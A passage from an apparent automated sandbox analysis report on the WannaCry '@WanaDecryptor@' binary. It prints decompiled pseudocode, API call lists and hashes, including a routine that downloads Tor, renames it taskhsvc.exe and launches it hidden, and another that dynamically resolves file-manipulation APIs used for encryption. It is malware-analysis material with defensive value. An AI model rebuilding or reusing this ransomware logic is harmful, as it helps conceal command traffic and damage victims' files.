                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
                                                      • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
                                                        • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                                        • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                                        • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                        • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                      • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
                                                      • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
                                                        • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                                        • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                                      • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
                                                      • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
                                                      • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
                                                      • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#800$#609#654#765#795$#616#641#781
                                                      • String ID: #
                                                      • API String ID: 2377847243-1885708031
                                                      • Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                                      • Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
                                                      • Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                                      • Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 85%
                                                      			E0040B840() {
                                                      				void _v519;
                                                      				char _v520;
                                                      				void _v1039;
                                                      				char _v1040;
                                                      				struct _STARTUPINFOA _v1108;
                                                      				struct _PROCESS_INFORMATION _v1124;
                                                      				char _t29;
                                                      				void* _t46;
                                                      				char _t47;
                                                      				void* _t55;
                                                      				void* _t56;
                                                      				void* _t84;
                                                      				void* _t86;
                                                      
                                                      				_t29 =  *0x421798; // 0x0
                                                      				_v1040 = _t29;
                                                      				memset( &_v1039, 0, 0x81 << 2);
                                                      				asm("stosw");
                                                      				asm("stosb");
                                                      				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
                                                      				_t84 =  &_v1124 + 0x20;
                                                      				if(GetFileAttributesA( &_v1040) != 0xffffffff) {
                                                      					L8:
                                                      					_v1108.cb = 0x44;
                                                      					_v1124.hProcess = 0;
                                                      					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
                                                      					_v1124.hThread = 0;
                                                      					_v1124.dwProcessId = 0;
                                                      					_v1124.dwThreadId = 0;
                                                      					_v1108.wShowWindow = 0;
                                                      					_v1108.dwFlags = 1;
                                                      					if(CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124) != 0) {
                                                      						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
                                                      							WaitForSingleObject(_v1124.hProcess, 0x7530);
                                                      						}
                                                      						CloseHandle(_v1124);
                                                      						CloseHandle(_v1124.hThread);
                                                      						return 1;
                                                      					} else {
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					_t46 = E0040B6A0("TaskData", "s.wnry", 0);
                                                      					_t86 = _t84 + 0xc;
                                                      					if(_t46 != 0) {
                                                      						L5:
                                                      						_t47 =  *0x421798; // 0x0
                                                      						_v520 = _t47;
                                                      						memset( &_v519, 0, 0x81 << 2);
                                                      						asm("stosw");
                                                      						asm("stosb");
                                                      						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
                                                      						_t84 = _t86 + 0x20;
                                                      						if(GetFileAttributesA( &_v520) != 0xffffffff) {
                                                      							CopyFileA( &_v520,  &_v1040, 0);
                                                      							goto L8;
                                                      						} else {
                                                      							return 0;
                                                      						}
                                                      					} else {
                                                      						_push(0);
                                                      						_t55 = E0040B780( &_v1040, "TaskData", "https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip");
                                                      						_t86 = _t86 + 0xc;
                                                      						if(_t55 != 0) {
                                                      							goto L5;
                                                      						} else {
                                                      							_push(0);
                                                      							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
                                                      							_t86 = _t86 + 0xc;
                                                      							if(_t56 != 0) {
                                                      								goto L5;
                                                      							} else {
                                                      								return _t56;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}

















                                                      APIs
                                                      • sprintf.MSVCRT ref: 0040B87A
                                                      • GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?), ref: 0040B88D
                                                      • CreateProcessA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA
                                                        • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000000,0019FA30), ref: 0040B6B4
                                                        • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      • sprintf.MSVCRT ref: 0040B924
                                                      • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
                                                        • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,0019FA30), ref: 0040B793
                                                        • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                                        • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                                        • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                                        • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
                                                      • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
                                                      • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
                                                      • WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6
                                                        • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
                                                      • String ID: %s\%s\%s$D$TaskData$Tor$https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry$taskhsvc.exe$tor.exe
                                                      • API String ID: 4284242699-3937372533
                                                      • Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                                      • Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
                                                      • Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                                      • Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E004032C0(intOrPtr __ecx) {
                                                      				intOrPtr _t16;
                                                      				long _t17;
                                                      				struct HFONT__* _t19;
                                                      				long _t20;
                                                      				long _t21;
                                                      				long _t23;
                                                      				int _t35;
                                                      				int _t38;
                                                      				int _t40;
                                                      				int _t47;
                                                      				intOrPtr _t48;
                                                      
                                                      				_t48 = __ecx;
                                                      				L00412CB0();
                                                      				_t16 =  *0x42189c; // 0x19f608
                                                      				_t17 =  *(_t16 + 0x824);
                                                      				 *(__ecx + 0xe8) = _t17;
                                                      				_push(CreateSolidBrush(_t17));
                                                      				L00412D5E();
                                                      				_t47 = __ecx + 0xec;
                                                      				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                                      				_push(_t19);
                                                      				L00412D5E();
                                                      				_push(0x408);
                                                      				L00412CE6();
                                                      				if(_t47 != 0) {
                                                      					_t35 =  *(_t47 + 4);
                                                      				} else {
                                                      					_t35 = 0;
                                                      				}
                                                      				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
                                                      				_push(0x409);
                                                      				L00412CE6();
                                                      				if(_t47 != 0) {
                                                      					_t38 =  *(_t47 + 4);
                                                      				} else {
                                                      					_t38 = 0;
                                                      				}
                                                      				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
                                                      				_push(2);
                                                      				L00412CE6();
                                                      				if(_t47 != 0) {
                                                      					_t40 =  *(_t47 + 4);
                                                      				} else {
                                                      					_t40 = 0;
                                                      				}
                                                      				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
                                                      				_push(0x40e);
                                                      				L00412CE6();
                                                      				if(_t47 != 0) {
                                                      					_t47 =  *(_t47 + 4);
                                                      				}
                                                      				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
                                                      				E00403CB0(_t48);
                                                      				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
                                                      				_push(0xffffffff);
                                                      				_push(0xffffffff);
                                                      				_push(0);
                                                      				_push("Path");
                                                      				_push(0);
                                                      				L00412D58();
                                                      				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
                                                      				 *0x4217bc = _t48;
                                                      				return 1;
                                                      			}















                                                      APIs
                                                      • #4710.MFC42 ref: 004032C5
                                                      • CreateSolidBrush.GDI32(?), ref: 004032DC
                                                      • #1641.MFC42(00000000), ref: 004032E9
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
                                                      • #1641.MFC42(00000000), ref: 0040331F
                                                      • #3092.MFC42(00000408,00000000), ref: 0040332B
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
                                                      • #3092.MFC42(00000409), ref: 00403353
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
                                                      • #3092.MFC42(00000002), ref: 00403372
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
                                                      • #3092.MFC42(0000040E), ref: 00403394
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
                                                      • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
                                                      • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
                                                      • String ID: Arial$Path
                                                      • API String ID: 2448086372-1872211634
                                                      • Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                                      • Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
                                                      • Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                                      • Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00402C40() {
                                                      				_Unknown_base(*)()* _t11;
                                                      				struct HINSTANCE__* _t23;
                                                      
                                                      				if(E00404B70() == 0) {
                                                      					L12:
                                                      					return 0;
                                                      				} else {
                                                      					if( *0x4217a0 == 0) {
                                                      						_t23 = LoadLibraryA("kernel32.dll");
                                                      						if(_t23 == 0) {
                                                      							goto L12;
                                                      						} else {
                                                      							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
                                                      							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
                                                      							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
                                                      							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
                                                      							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
                                                      							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
                                                      							_t11 = GetProcAddress(_t23, "CloseHandle");
                                                      							 *0x4217b8 = _t11;
                                                      							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
                                                      								goto L12;
                                                      							} else {
                                                      								return 1;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						return 1;
                                                      					}
                                                      				}
                                                      			}






                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
                                                      • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
                                                      • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
                                                      • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
                                                      • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
                                                      • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
                                                      • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
                                                      • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                      • API String ID: 2238633743-1294736154
                                                      • Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                                      • Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
                                                      • Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                                      • Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
                                                      				intOrPtr _v0;
                                                      				unsigned int _v4;
                                                      				unsigned int _v8;
                                                      				unsigned int _v12;
                                                      				intOrPtr _v20;
                                                      				char _v36;
                                                      				intOrPtr _v56;
                                                      				char _v60;
                                                      				intOrPtr _v64;
                                                      				char _v68;
                                                      				unsigned int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				intOrPtr _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed long long _v100;
                                                      				intOrPtr _v104;
                                                      				void* _v108;
                                                      				void* _v112;
                                                      				void* _v120;
                                                      				unsigned int _t93;
                                                      				signed int _t96;
                                                      				signed int _t100;
                                                      				unsigned int _t102;
                                                      				signed int _t107;
                                                      				int _t112;
                                                      				char _t113;
                                                      				signed char _t115;
                                                      				RECT* _t122;
                                                      				signed int _t125;
                                                      				signed int _t134;
                                                      				intOrPtr* _t135;
                                                      				unsigned int _t138;
                                                      				signed int _t140;
                                                      				signed int _t143;
                                                      				intOrPtr* _t146;
                                                      				char _t151;
                                                      				char _t152;
                                                      				signed int _t169;
                                                      				intOrPtr* _t177;
                                                      				signed int _t192;
                                                      				intOrPtr* _t193;
                                                      				intOrPtr _t195;
                                                      				unsigned int _t202;
                                                      				char _t209;
                                                      				intOrPtr _t210;
                                                      				signed long long _t228;
                                                      				signed long long _t229;
                                                      				signed long long _t230;
                                                      				signed long long _t231;
                                                      				signed long long _t234;
                                                      
                                                      				_t228 = __fp0;
                                                      				_push(0xffffffff);
                                                      				_push(E004140A0);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t210;
                                                      				_t93 = _a20;
                                                      				_v104 = __ecx;
                                                      				_t138 = _a16;
                                                      				_t169 = _t138 & 0x000000ff;
                                                      				_v76 = _t169;
                                                      				_t192 = (_t93 & 0x000000ff) - _t169;
                                                      				_t140 = _t138 >> 0x00000010 & 0x000000ff;
                                                      				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
                                                      				_v88 = 0;
                                                      				_v96 = _t96;
                                                      				_v92 = _t140;
                                                      				asm("cdq");
                                                      				_t143 = _t96 ^ 0;
                                                      				_v100 = 0;
                                                      				asm("cdq");
                                                      				_a20 = _t192;
                                                      				_t134 = 0;
                                                      				if(0 <= _t143) {
                                                      					_t134 = _t143;
                                                      				}
                                                      				asm("cdq");
                                                      				_t100 = _t192 ^ 0;
                                                      				if(_t100 <= _t134) {
                                                      					_a16 = 0;
                                                      					if(0 <= _t143) {
                                                      						_a16 = _t143;
                                                      					}
                                                      				} else {
                                                      					_a16 = _t100;
                                                      				}
                                                      				_t193 = _a8;
                                                      				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
                                                      				if(_t102 < _a16) {
                                                      					_a16 = _t102;
                                                      				}
                                                      				if(_a16 == 0) {
                                                      					_a16 = 1;
                                                      				}
                                                      				asm("fild dword [esp+0x88]");
                                                      				asm("fild dword [esp+0x8c]");
                                                      				_t135 = _a4;
                                                      				_t229 = _t228 / st1;
                                                      				_v80 = _t229;
                                                      				asm("fild dword [esp+0x1c]");
                                                      				_t230 = _t229 / st1;
                                                      				_v100 = _t230;
                                                      				asm("fild dword [esp+0x20]");
                                                      				_t231 = _t230 / st1;
                                                      				_v96 = _t231;
                                                      				st0 = _t231;
                                                      				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
                                                      				_v80 = _t107;
                                                      				if(_t107 == 0 && _a8 > 1) {
                                                      					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
                                                      					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
                                                      						_v8 = 1;
                                                      					}
                                                      				}
                                                      				_t146 = _t193;
                                                      				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
                                                      				_t202 = 0;
                                                      				asm("fild dword [esp+0x8c]");
                                                      				_v72 = 0;
                                                      				_v68 =  *_t146;
                                                      				_v76 = 0x415a44;
                                                      				asm("fidiv dword [esp+0x88]");
                                                      				_v64 =  *((intOrPtr*)(_t146 + 4));
                                                      				_v60 =  *((intOrPtr*)(_t146 + 8));
                                                      				_v56 =  *((intOrPtr*)(_t146 + 0xc));
                                                      				_a12 = _t231;
                                                      				_t112 = _a8;
                                                      				_v12 = 0;
                                                      				_v4 = 0;
                                                      				if(_t112 <= 0) {
                                                      					L31:
                                                      					_v76 = 0x415c00;
                                                      					_v12 = 1;
                                                      					L00412D52();
                                                      					 *[fs:0x0] = _v20;
                                                      					return _t112;
                                                      				} else {
                                                      					while(1) {
                                                      						asm("fild dword [esp+0x7c]");
                                                      						_t195 =  *_t193;
                                                      						L0041304A();
                                                      						_t46 = _t202 + 1; // 0x1
                                                      						_v4 = _t46;
                                                      						_t209 = _t112 + _t195;
                                                      						asm("fild dword [esp+0x7c]");
                                                      						_v68 = _t209;
                                                      						_t234 = st0 * _a12 * _a12;
                                                      						L0041304A();
                                                      						_t113 = _t112 + _t195;
                                                      						_v60 = _t113;
                                                      						if(_t202 == _a8 - 1) {
                                                      							_t113 =  *((intOrPtr*)(_v0 + 8));
                                                      							_v60 = _t113;
                                                      						}
                                                      						_t177 = _a4;
                                                      						_t151 =  *_t177;
                                                      						if(_t113 < _t151) {
                                                      							goto L29;
                                                      						}
                                                      						if(_t209 < _t151) {
                                                      							_v68 = _t151;
                                                      						}
                                                      						_t152 =  *((intOrPtr*)(_t177 + 8));
                                                      						if(_t113 > _t152) {
                                                      							_v60 = _t152;
                                                      						}
                                                      						L0041304A();
                                                      						_v92 = 0;
                                                      						L0041304A();
                                                      						_t115 = _t113 + _v100 + _v96;
                                                      						_v92 = _t115 << 8;
                                                      						L0041304A();
                                                      						_push(_t115 + _v84 & 0x000000ff | _v92);
                                                      						if(_v80 == 0) {
                                                      							_t112 = E00409D40( &_v36, _t135,  &_v68);
                                                      							_push(_t112);
                                                      							L00412FF2();
                                                      						} else {
                                                      							_push(CreateSolidBrush());
                                                      							L00412D5E();
                                                      							_t122 = E00409D40( &_v60, _t135,  &_v76);
                                                      							_t76 =  &_v96; // 0x415a44
                                                      							asm("sbb ecx, ecx");
                                                      							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
                                                      							L00412D52();
                                                      						}
                                                      						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
                                                      							L30:
                                                      							_t202 = _v4;
                                                      							_t112 = _a8;
                                                      							_v4 = _t202;
                                                      							if(_t202 < _t112) {
                                                      								_t193 = _v0;
                                                      								continue;
                                                      							}
                                                      						}
                                                      						goto L31;
                                                      						L29:
                                                      						st0 = _t234;
                                                      						goto L30;
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
                                                      • String ID: DZA
                                                      • API String ID: 2487345631-3378329814
                                                      • Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                                      • Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
                                                      • Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                                      • Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E00404DD0(void* __ecx) {
                                                      				intOrPtr _t12;
                                                      				long _t13;
                                                      				struct HFONT__* _t15;
                                                      				long _t16;
                                                      				long _t17;
                                                      				int _t29;
                                                      				int _t32;
                                                      				int _t35;
                                                      
                                                      				L00412CB0();
                                                      				_t12 =  *0x42189c; // 0x19f608
                                                      				_t13 =  *(_t12 + 0x824);
                                                      				 *(__ecx + 0x6c) = _t13;
                                                      				_push(CreateSolidBrush(_t13));
                                                      				L00412D5E();
                                                      				_t35 = __ecx + 0x70;
                                                      				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                                      				_push(_t15);
                                                      				L00412D5E();
                                                      				_push(0x403);
                                                      				L00412CE6();
                                                      				if(_t35 != 0) {
                                                      					_t29 =  *(_t35 + 4);
                                                      				} else {
                                                      					_t29 = 0;
                                                      				}
                                                      				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
                                                      				_push(1);
                                                      				L00412CE6();
                                                      				if(_t35 != 0) {
                                                      					_t32 =  *(_t35 + 4);
                                                      				} else {
                                                      					_t32 = 0;
                                                      				}
                                                      				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
                                                      				_push(2);
                                                      				L00412CE6();
                                                      				if(_t35 != 0) {
                                                      					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
                                                      					return 1;
                                                      				} else {
                                                      					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
                                                      					return 1;
                                                      				}
                                                      			}

                                                      APIs
                                                      • #4710.MFC42 ref: 00404DD5
                                                      • CreateSolidBrush.GDI32(?), ref: 00404DE9
                                                      • #1641.MFC42(00000000), ref: 00404DF3
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
                                                      • #1641.MFC42(00000000), ref: 00404E26
                                                      • #3092.MFC42(00000403,00000000), ref: 00404E32
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
                                                      • #3092.MFC42(00000001), ref: 00404E57
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
                                                      • #3092.MFC42(00000002), ref: 00404E76
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
